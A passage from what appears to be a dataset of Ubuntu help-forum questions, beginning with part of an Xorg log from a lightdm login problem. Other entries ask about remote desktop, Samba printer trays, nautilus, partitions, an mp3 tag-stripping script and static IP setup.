extension xvideo [ 340.323 ] initializing built-in extension xvideo-motioncompensation [ 340.323 ] initializing built-in extension xfree86-vidmodeextension [ 340.323 ] initializing built-in extension xfree86-dga [ 340.323 ] initializing built-in extension xfree86-dri [ 340.323 ] initializing built-in extension dri2 [ 340.323 ] ( ii ) loadmodule : `` glx '' [ 340.323 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 340.324 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 340.324 ] compiled for 1.13.0 , module version = 1.0.0 [ 340.324 ] abi class : x.org server extension , version 7.0 [ 340.324 ] ( == ) aiglx enabled [ 340.324 ] loading extension glx [ 340.324 ] ( == ) matched intel as autoconfigured driver 0 [ 340.324 ] ( == ) matched intel as autoconfigured driver 1 [ 340.324 ] ( == ) matched vesa as autoconfigured driver 2 [ 340.324 ] ( == ) matched modesetting as autoconfigured driver 3 [ 340.324 ] ( == ) matched fbdev as autoconfigured driver 4 [ 340.324 ] ( == ) assigned the driver to the xf86configlayout [ 340.324 ] ( ii ) loadmodule : `` intel '' [ 340.324 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 340.324 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 340.324 ] compiled for 1.13.0 , module version = 2.20.9 [ 340.324 ] module class : x.org video driver [ 340.324 ] abi class : x.org video driver , version 13.0 [ 340.324 ] ( ii ) loadmodule : `` vesa '' [ 340.325 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 340.325 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 340.325 ] compiled for 1.12.99.902 , module version = 2.3.2 [ 340.325 ] module class : x.org video driver [ 340.325 ] abi class : x.org video driver , version 13.0 [ 340.325 ] ( ii ) loadmodule : `` modesetting '' [ 340.325 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 340.325 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 340.325 ] compiled for 1.13.0 , module version = 0.5.0 [ 340.325 ] module class : x.org video driver [ 340.325 ] abi class : x.org video driver , version 13.0 [ 340.325 ] ( ii ) loadmodule : `` fbdev '' [ 340.325 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 340.325 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 340.325 ] compiled for 1.12.99.902 , module version = 0.4.3 [ 340.325 ] module class : x.org video driver [ 340.325 ] abi class : x.org video driver , version 13.0 [ 340.325 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , haswell desktop ( gt1 ) , haswell desktop ( gt2 ) , haswell desktop ( gt2+ ) , haswell mobile ( gt1 ) , haswell mobile ( gt2 ) , haswell mobile ( gt2+ ) , haswell server ( gt1 ) , haswell server ( gt2 ) , haswell server ( gt2+ ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt2+ ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt2+ ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt2+ ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , haswell ult desktop ( gt2+ ) , haswell ult mobile ( gt1 ) , haswell ult mobile ( gt2 ) , haswell ult mobile ( gt2+ ) , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , haswell ult server ( gt2+ ) , haswell crw desktop ( gt1 ) , haswell crw desktop ( gt2 ) , haswell crw desktop ( gt2+ ) , haswell crw mobile ( gt1 ) , haswell crw mobile ( gt2 ) , haswell crw mobile ( gt2+ ) , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , haswell crw server ( gt2+ ) , valleyview po board [ 340.326 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 340.326 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 340.326 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 340.326 ] ( ++ ) using vt number 7 [ 340.326 ] ( ii ) intel ( 0 ) : using device path '/dev/dri/card0' [ 340.326 ] ( ww ) falling back to old probe method for vesa [ 340.326 ] ( ww ) falling back to old probe method for modesetting [ 340.326 ] ( ww ) falling back to old probe method for fbdev [ 340.326 ] ( ii ) loading sub module `` fbdevhw '' [ 340.326 ] ( ii ) loadmodule : `` fbdevhw '' [ 340.326 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 340.326 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 340.326 ] compiled for 1.13.0 , module version = 0.0.2 [ 340.326 ] abi class : x.org video driver , version 13.0 [ 340.326 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 340.326 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 340.326 ] ( == ) intel ( 0 ) : rgb weight 888 [ 340.326 ] ( == ) intel ( 0 ) : default visual is truecolor [ 340.326 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) sandybridge desktop ( gt1 ) ... .. edit for brevity ... .. [ 340.861 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.861 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.861 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.861 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 340.861 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 340.861 ] ( ii ) using input driver 'evdev ' for 'power button' [ 340.861 ] ( ** ) power button : always reports core events [ 340.861 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 340.861 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 340.861 ] ( -- ) evdev : power button : found keys [ 340.861 ] ( ii ) evdev : power button : configuring as keyboard [ 340.861 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 340.861 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 340.861 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.861 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.861 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.861 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 340.862 ] ( ii ) config/udev : adding input device hda intel pch front mic ( /dev/input/event10 ) [ 340.862 ] ( ii ) no input driver specified , ignoring this device . [ 340.862 ] ( ii ) this device may have been added with another device file . [ 340.862 ] ( ii ) config/udev : adding input device hda intel pch rear mic ( /dev/input/event11 ) [ 340.862 ] ( ii ) no input driver specified , ignoring this device . [ 340.862 ] ( ii ) this device may have been added with another device file . [ 340.862 ] ( ii ) config/udev : adding input device hda intel pch front headphone ( /dev/input/event12 ) [ 340.862 ] ( ii ) no input driver specified , ignoring this device . [ 340.862 ] ( ii ) this device may have been added with another device file . [ 340.862 ] ( ii ) config/udev : adding input device hda intel pch line out clfe ( /dev/input/event13 ) [ 340.862 ] ( ii ) no input driver specified , ignoring this device . [ 340.862 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hda intel pch line out surround ( /dev/input/event14 ) [ 340.863 ] ( ii ) no input driver specified , ignoring this device . [ 340.863 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hda intel pch line out front ( /dev/input/event15 ) [ 340.863 ] ( ii ) no input driver specified , ignoring this device . [ 340.863 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hda intel pch hdmi/dp , pcm=7 ( /dev/input/event7 ) [ 340.863 ] ( ii ) no input driver specified , ignoring this device . [ 340.863 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hda intel pch hdmi/dp , pcm=3 ( /dev/input/event8 ) [ 340.863 ] ( ii ) no input driver specified , ignoring this device . [ 340.863 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hda intel pch line ( /dev/input/event9 ) [ 340.863 ] ( ii ) no input driver specified , ignoring this device . [ 340.863 ] ( ii ) this device may have been added with another device file . [ 340.863 ] ( ii ) config/udev : adding input device hid 0c16:0001 ( /dev/input/event5 ) [ 340.863 ] ( ** ) hid 0c16:0001 : applying inputclass `` evdev keyboard catchall '' [ 340.863 ] ( ii ) using input driver 'evdev ' for 'hid 0c16:0001' [ 340.863 ] ( ** ) hid 0c16:0001 : always reports core events [ 340.864 ] ( ** ) evdev : hid 0c16:0001 : device : `` /dev/input/event5 '' [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : vendor 0xc16 product 0x1 [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found keys [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : configuring as keyboard [ 340.864 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-1/3-1.3/3-1.3:1.0/input/input5/event5 '' [ 340.864 ] ( ii ) xinput : adding extended input device `` hid 0c16:0001 '' ( type : keyboard , id 8 ) [ 340.864 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.864 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.864 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.864 ] ( ii ) config/udev : adding input device hid 0c16:0001 ( /dev/input/event6 ) [ 340.864 ] ( ** ) hid 0c16:0001 : applying inputclass `` evdev pointer catchall '' [ 340.864 ] ( ** ) hid 0c16:0001 : applying inputclass `` evdev keyboard catchall '' [ 340.864 ] ( ii ) using input driver 'evdev ' for 'hid 0c16:0001' [ 340.864 ] ( ** ) hid 0c16:0001 : always reports core events [ 340.864 ] ( ** ) evdev : hid 0c16:0001 : device : `` /dev/input/event6 '' [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : vendor 0xc16 product 0x1 [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found 13 mouse buttons [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found scroll wheel ( s ) [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found relative axes [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found x and y relative axes [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found absolute axes [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : forcing absolute x/y axes to exist . [ 340.864 ] ( -- ) evdev : hid 0c16:0001 : found keys [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : configuring as mouse [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : configuring as keyboard [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : adding scrollwheel support [ 340.864 ] ( ** ) evdev : hid 0c16:0001 : yaxismapping : buttons 4 and 5 [ 340.864 ] ( ** ) evdev : hid 0c16:0001 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 340.864 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1c.3/0000:04:00.0/usb3/3-1/3-1.3/3-1.3:1.1/input/input6/event6 '' [ 340.864 ] ( ii ) xinput : adding extended input device `` hid 0c16:0001 '' ( type : keyboard , id 9 ) [ 340.864 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.864 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.864 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.864 ] ( ii ) evdev : hid 0c16:0001 : initialized for relative axes . [ 340.864 ] ( ww ) evdev : hid 0c16:0001 : ignoring absolute axes . [ 340.864 ] ( ** ) hid 0c16:0001 : ( accel ) keeping acceleration scheme 1 [ 340.864 ] ( ** ) hid 0c16:0001 : ( accel ) acceleration profile 0 [ 340.865 ] ( ** ) hid 0c16:0001 : ( accel ) acceleration factor : 2.000 [ 340.865 ] ( ** ) hid 0c16:0001 : ( accel ) acceleration threshold : 4 [ 340.865 ] ( ii ) config/udev : adding input device hid 0c16:0001 ( /dev/input/mouse1 ) [ 340.865 ] ( ii ) no input driver specified , ignoring this device . [ 340.865 ] ( ii ) this device may have been added with another device file . [ 340.865 ] ( ii ) config/udev : adding input device chicony usb el backlit keyboard ( /dev/input/event2 ) [ 340.865 ] ( ** ) chicony usb el backlit keyboard : applying inputclass `` evdev keyboard catchall '' [ 340.865 ] ( ii ) using input driver 'evdev ' for 'chicony usb el backlit keyboard' [ 340.865 ] ( ** ) chicony usb el backlit keyboard : always reports core events [ 340.865 ] ( ** ) evdev : chicony usb el backlit keyboard : device : `` /dev/input/event2 '' [ 340.865 ] ( -- ) evdev : chicony usb el backlit keyboard : vendor 0x4f2 product 0x533 [ 340.865 ] ( -- ) evdev : chicony usb el backlit keyboard : found keys [ 340.865 ] ( ii ) evdev : chicony usb el backlit keyboard : configuring as keyboard [ 340.865 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.0/input/input2/event2 '' [ 340.865 ] ( ii ) xinput : adding extended input device `` chicony usb el backlit keyboard '' ( type : keyboard , id 10 ) [ 340.865 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.865 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.865 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.865 ] ( ii ) config/udev : adding input device chicony usb el backlit keyboard ( /dev/input/event3 ) [ 340.865 ] ( ** ) chicony usb el backlit keyboard : applying inputclass `` evdev keyboard catchall '' [ 340.865 ] ( ii ) using input driver 'evdev ' for 'chicony usb el backlit keyboard' [ 340.866 ] ( ** ) chicony usb el backlit keyboard : always reports core events [ 340.866 ] ( ** ) evdev : chicony usb el backlit keyboard : device : `` /dev/input/event3 '' [ 340.866 ] ( -- ) evdev : chicony usb el backlit keyboard : vendor 0x4f2 product 0x533 [ 340.866 ] ( -- ) evdev : chicony usb el backlit keyboard : found keys [ 340.866 ] ( ii ) evdev : chicony usb el backlit keyboard : configuring as keyboard [ 340.866 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.4/2-1.4:1.1/input/input3/event3 '' [ 340.866 ] ( ii ) xinput : adding extended input device `` chicony usb el backlit keyboard '' ( type : keyboard , id 11 ) [ 340.866 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 340.866 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 340.866 ] ( ** ) option `` xkb_layout '' `` us '' [ 340.866 ] ( ii ) config/udev : adding input device pixart usb optical mouse ( /dev/input/event4 ) [ 340.866 ] ( ** ) pixart usb optical mouse : applying inputclass `` evdev pointer catchall '' [ 340.866 ] ( ii ) using input driver 'evdev ' for 'pixart usb optical mouse' [ 340.866 ] ( ** ) pixart usb optical mouse : always reports core events [ 340.866 ] ( ** ) evdev : pixart usb optical mouse : device : `` /dev/input/event4 '' [ 340.866 ] ( -- ) evdev : pixart usb optical mouse : vendor 0x93a product 0x2510 [ 340.866 ] ( -- ) evdev : pixart usb optical mouse : found 3 mouse buttons [ 340.866 ] ( -- ) evdev : pixart usb optical mouse : found scroll wheel ( s ) [ 340.866 ] ( -- ) evdev : pixart usb optical mouse : found relative axes [ 340.866 ] ( -- ) evdev : pixart usb optical mouse : found x and y relative axes [ 340.866 ] ( ii ) evdev : pixart usb optical mouse : configuring as mouse [ 340.866 ] ( ii ) evdev : pixart usb optical mouse : adding scrollwheel support [ 340.866 ] ( ** ) evdev : pixart usb optical mouse : yaxismapping : buttons 4 and 5 [ 340.866 ] ( ** ) evdev : pixart usb optical mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 340.866 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0/input/input4/event4 '' [ 340.866 ] ( ii ) xinput : adding extended input device `` pixart usb optical mouse '' ( type : mouse , id 12 ) [ 340.866 ] ( ii ) evdev : pixart usb optical mouse : initialized for relative axes . [ 340.866 ] ( ** ) pixart usb optical mouse : ( accel ) keeping acceleration scheme 1 [ 340.866 ] ( ** ) pixart usb optical mouse : ( accel ) acceleration profile 0 [ 340.866 ] ( ** ) pixart usb optical mouse : ( accel ) acceleration factor : 2.000 [ 340.866 ] ( ** ) pixart usb optical mouse : ( accel ) acceleration threshold : 4 [ 340.866 ] ( ii ) config/udev : adding input device pixart usb optical mouse ( /dev/input/mouse0 ) [ 340.866 ] ( ii ) no input driver specified , ignoring this device . [ 340.866 ] ( ii ) this device may have been added with another device file . [ 341.141 ] ( ii ) intel ( 0 ) : edid vendor `` gsm '' , prod id 22553 [ 341.141 ] ( ii ) intel ( 0 ) : using edid range info for horizontal sync [ 341.141 ] ( ii ) intel ( 0 ) : using edid range info for vertical refresh [ 341.141 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1920x1080 '' x0.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync ( 67.5 khz ep ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 720x400 '' x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.0 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x0.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz e ) [ 341.141 ] ( ii ) intel ( 0 ) : modeline `` 1680x1050 '' x0.0 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync ( 64.7 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : edid vendor `` gsm '' , prod id 22553 [ 341.481 ] ( ii ) intel ( 0 ) : using hsync ranges from config file [ 341.481 ] ( ii ) intel ( 0 ) : using vrefresh ranges from config file [ 341.481 ] ( ii ) intel ( 0 ) : printing ddc gathered modelines : [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 1920x1080 '' x0.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync +vsync ( 67.5 khz ep ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 640x480 '' x0.0 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 720x400 '' x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.0 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 1024x768 '' x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 800x600 '' x0.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz e ) [ 341.481 ] ( ii ) intel ( 0 ) : modeline `` 1152x864 '' x0.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz e ) [ 341.482 ] ( ii ) intel ( 0 ) : modeline `` 1280x1024 '' x0.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz e ) [ 341.482 ] ( ii ) intel ( 0 ) : modeline `` 1680x1050 '' x0.0 119.00 1680 1728 1760 1840 1050 1053 1059 1080 +hsync -vsync ( 64.7 khz e ) [ 346.532 ] ( ii ) evdev : pixart usb optical mouse : close [ 346.532 ] ( ii ) unloadmodule : `` evdev '' [ 346.532 ] ( ii ) evdev : chicony usb el backlit keyboard : close [ 346.532 ] ( ii ) unloadmodule : `` evdev '' [ 346.532 ] ( ii ) evdev : chicony usb el backlit keyboard : close [ 346.532 ] ( ii ) unloadmodule : `` evdev '' [ 346.532 ] ( ii ) evdev : hid 0c16:0001 : close [ 346.532 ] ( ii ) unloadmodule : `` evdev '' [ 346.532 ] ( ii ) evdev : hid 0c16:0001 : close [ 346.532 ] ( ii ) unloadmodule : `` evdev '' [ 346.532 ] ( ii ) evdev : power button : close [ 346.533 ] ( ii ) unloadmodule : `` evdev '' [ 346.533 ] ( ii ) evdev : power button : close [ 346.533 ] ( ii ) unloadmodule : `` evdev '' [ 346.764 ] server terminated successfully ( 0 ) . closing log file . i have a stack of notes generated by the command/script mylog=/media/hbo-raid/raid-storage/mylog $ ( date + % t- % d. % m. % y ) .log ; echo ' [ ' '' code '' ' ] ' > > $ { mylog } & & uname -a > > $ { mylog } & & lsb_release -a > > $ { mylog } & & for logfile in $ ( ls /var/log/*.log ) ; do sudo grep -ihw 'segfault\|warning\|error\|critical\|lightdm\|\ ( ww \ ) \|\ ( ee\ ) ' $ logfile | tee -a $ { mylog } ; done & & echo ' [ ' '' code '' ' ] ' > > $ { mylog } right now i 'm thinking permissions or similar . it says i do n't have rights to login without password , which i normally have this machine set for . /var/log/auth.log : dec 19 01:06:23 hbo lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` abe ''
230115	remote desktop from windows to ubuntu	the only monitor i have is one of those crt huge dinosaurs . i want to access my ubuntu machine from my windows laptop . i have tried a few vnc programs already and i cant get it to work . any tips ? or is there a way i can control my ubuntu machine from my laptop physically , like using a cord or something like that ?
230116	how to get hp printer to select correct trays on samba shared printer	my first post here . clean install of 12.04.1 . previously 10.04 . have been running a p2035n printer without problem . now , no matter what paper tray i select it prints to the top `` by-pass '' feeder -- not the lower main tray . and when i select to print to manual feed , it does not wait for me to put in paper ( like it used to ) , but prints immediately . the printer is on a samba share and is physically plugged into a winxp machine . its uri is smb : ///computername/p2035n . i have tried several of the offered drivers for this hp machine , and even tried generic-laser . same result on all . here are some other things i have tried ( losing 2-3 hours of my time ! ) : hp-check -t reports “error : user needs to be member of group 'lp ' to enable print , scan & fax . ” and “warning : printer is not hplip installed . printers must use the hp : or hpfax : cups backend to function in hplip.” needed to download hplip 3.12.11 followed http : //hplipopensource.com/hplip-web/install/install/index.html sh hplip-3.12.11-run says that before setup logout and then on login run hp-setup hp-setup could not find the printer ran hp-check -t again , found i was not in group lp ran hp-check -- fix and it fixed that problem , asks for reboot rebooted after running update manager ( new kernel ) and hp-check -t shows no errors this time all the tray selections end up on the bypass tray hp-setup still can not find the printer so is there a way to make this work ? thanks ! : - doug .
230117	launch nautilus with option for path	i have ctrl+super+n set to launch gksu nautilus . this set me thinking : can i have a prompt that comes up that asks me for a path to open ? ideally , i 'd be able to hit a key combo , type /usr/share/applications , and have nautilus open up without having to use the gui to get there .
230125	on which partition is ubuntu located ?	i 'm trying to delete the ubuntu partition and then later i 'm planning on running ubuntu through vitualbox on windows 7 . the problem is i do n't know which partition is ubuntu so i can use that space for windows .
230130	printing pdf 's on 12.10	just switched from win7 64 bit . when i print out credit card statement , dollar sign prints over the top of the first numeral , whether it is $ 5.00 or $ 500.00 . ? ? ? how to fix ?
230133	mail server crash	i have a mail server running ubuntu 12.04 . my server has a main 200gb hdd as the / , and other scsi hdd . as far as i recall , i used the 5 scsi hard drives for different mount points - swap , /usr , boot , and the rest i can not recall . just yesterday , my /usr drive died ... and it wont let me boot into the server . i 've tried to skip mounting the /usr with the s option when i go to recovery drive , but the server still wont boot up . i need help badly because the server needs to be up and running asap . thank you for all the help .
230134	how long to install	how long does it take ubuntu 12.10 to install ? it has been over an hour and a half . it says installing but nothing is happening .
230135	bash script using eyed3 to remove extra tags from mp3 files	i found what looks like the perfect script for this but getting errors . hoping someone can see problem . i am running 12.04 server . error is awk : line 0 : regular expression compile failed ( missing ' ( ' ) ) : awk : line 0 : regular expression compile failed ( missing ' ( ' ) ) > the following tags have been found in the mp3s : these tags are to be stripped : here is a the script obtained from savvyadmin # ! /bin/bash # script name : strip-tags.sh # original author : ian of darkstarshout blog # site : http : //darkstarshout.blogspot.com/ # options slightly modified to liking of savvyadmin.com oktags= '' talb apic tcon tpe1 tpe2 tpe3 tit2 trck tyer tcom tpos '' indexfile=`mktemp` # determine tags present : find . -iname `` *.mp3 '' -exec eyed3 -- no-color -v { } \ ; > $ indexfile tagspresent=`sort -u $ indexfile | awk -f\ ) : '/^ < . * $ / { print $ 1 } ' \ | uniq | awk -f\ ) \ > ' { print $ 1 } ' | awk -f\ ( ' { print $ ( nf ) } ' \ | awk 'begin { ors= '' `` } { print $ 0 } '` rm $ indexfile # determine tags to strip : tostrip=`echo -n $ tagspresent $ oktags $ oktags \ | awk 'begin { rs= '' `` ; ors= '' \n '' } { print $ 0 } ' | sort | uniq -u \ | awk 'begin { ors= '' `` } { print $ 0 } '` # confirm action : echo echo the following tags have been found in the mp3s : echo $ tagspresent echo these tags are to be stripped : echo $ tostrip echo echo -n press enter to confirm , or ctrl+c to cancel ... read dummy # strip 'em stripstring=`echo $ tostrip \ | awk 'begin { fs= '' \n '' ; rs= '' `` } { print `` -- set-text-frame= '' $ 1 `` : `` } '` # first pass copies any v1.x tags to v2.3 and strips unwanted tag data . # second pass removes v1.x tags , since i do n't like to use them . # without -- no-tagging-time-frame , a new unwanted tag is added . : - ) find . -iname `` *.mp3 '' \ -exec eyed3 -- to-v2.3 -- no-tagging-time-frame $ stripstring { } \ ; \ -exec eyed3 -- remove-v1 -- no-tagging-time-frame { } \ ; echo `` script complete ! ''
230143	why does eth0 disappear when i set a static ip ( server 12.10 )	for some reason , if i try to set a static ip address , my eth0 disappears from ifconfig 's output . i am running ubuntu server 12.10 on a gateway laptop . auto eth0 iface eth0 inet dhcp gives this output when i run ifconfig eth0 link encap : ethernet hwaddr xx : xx : xx : xx : xx : xx inet addr:192.168.1.101 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2e0 : b8ff : fee7 : f71c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:281 errors:0 dropped:0 overruns:0 frame:0 tx packets:352 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:31874 ( 31.8 kb ) tx bytes:45369 ( 45.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:430 errors:0 dropped:0 overruns:0 frame:0 tx packets:430 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:41740 ( 41.7 kb ) tx bytes:41740 ( 41.7 kb ) when i change to static : auto eth0 iface eth0 inet static address 192.168.1.37 netmask 225.225.225.0 gateway 192.168.1.1 then run a service networking restart i only get the loopback block from ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:430 errors:0 dropped:0 overruns:0 frame:0 tx packets:430 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:41740 ( 41.7 kb ) tx bytes:41740 ( 41.7 kb ) however , i can force a static ip with ifconfig eth0 192.168.1.37 netmask 255.255.255.0 but obviously this goes away on a reboot . why will one way work but not the other ? am i doing something wrong ?
